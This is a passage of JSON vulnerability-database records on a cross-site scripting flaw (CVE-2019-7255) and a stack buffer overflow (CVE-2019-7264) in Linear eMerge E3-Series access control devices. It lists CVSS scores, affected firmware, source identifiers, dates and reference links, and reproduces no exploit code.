                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2019-21273",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-158690",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.1,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2019-7255",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7255",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-21273",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-108",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158690",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-7255",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow XSS. Linear eMerge E3 series devices contain a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Nortek Security\u0026ControlLineareMergeE3-Series is an access control device from Nortek Security \u0026 Control. A cross-site scripting vulnerability exists in LineareMergeE3-Series. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7255"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47623",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7255",
            "trust": 4.0
          },
          {
            "db": "PACKETSTORM",
            "id": "155253",
            "trust": 1.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108",
            "trust": 0.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47623",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158690",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7255",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "id": "VAR-201907-0156",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158690"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.568000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          },
          {
            "title": "Kenzer Templates [5170] [DEPRECATED]",
            "trust": 0.1,
            "url": "https://github.com/arpsyndicate/kenzer-templates "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-7255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.2,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.4,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/155253/linear-emerge-e3-1.00-06-cross-site-scripting.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7255"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          },
          {
            "trust": 0.7,
            "url": "https://www.exploit-db.com/exploits/47623"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/arpsyndicate/kenzer-templates"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7255"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          },
          {
            "date": "2019-07-02T19:15:11.087000",
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-21273"
          },
          {
            "date": "2019-11-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158690"
          },
          {
            "date": "2022-10-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7255"
          },
          {
            "date": "2024-03-07T07:20:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          },
          {
            "date": "2019-11-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          },
          {
            "date": "2022-10-14T01:21:44.847000",
            "db": "NVD",
            "id": "CVE-2019-7255"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Cross-site scripting vulnerability in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005908"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-108"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0165

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow a Stack-based Buffer Overflow on the ARM platform. Linear eMerge E3 series devices contain a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security&Control Linear eMerge E3-Series is an access control device from Nortek Security&Control Company in the United States. An attacker could exploit this vulnerability to execute arbitrary code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0165",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "cve": "CVE-2019-7264",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7264",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158699",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7264",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7264",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-098",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158699",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-7264",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices allow a Stack-based Buffer Overflow on the ARM platform. Linear eMerge E3 series devices contain a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security\u0026Control Linear eMerge E3-Series is an access control device from Nortek Security\u0026Control Company in the United States. An attacker could exploit this vulnerability to execute arbitrary code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7264"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7264",
            "trust": 3.4
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-098",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-158699",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7264",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "id": "VAR-201907-0165",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158699"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-03-18T22:23:59.540000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.1
          },
          {
            "problemtype": "Buffer error (CWE-119) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-119",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 1.8,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7264"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7264"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          },
          {
            "date": "2019-07-02T17:15:12.007000",
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158699"
          },
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7264"
          },
          {
            "date": "2024-03-07T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005912"
          },
          {
            "date": "2020-08-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          },
          {
            "date": "2020-08-24T17:37:01.140000",
            "db": "NVD",
            "id": "CVE-2019-7264"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-098"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
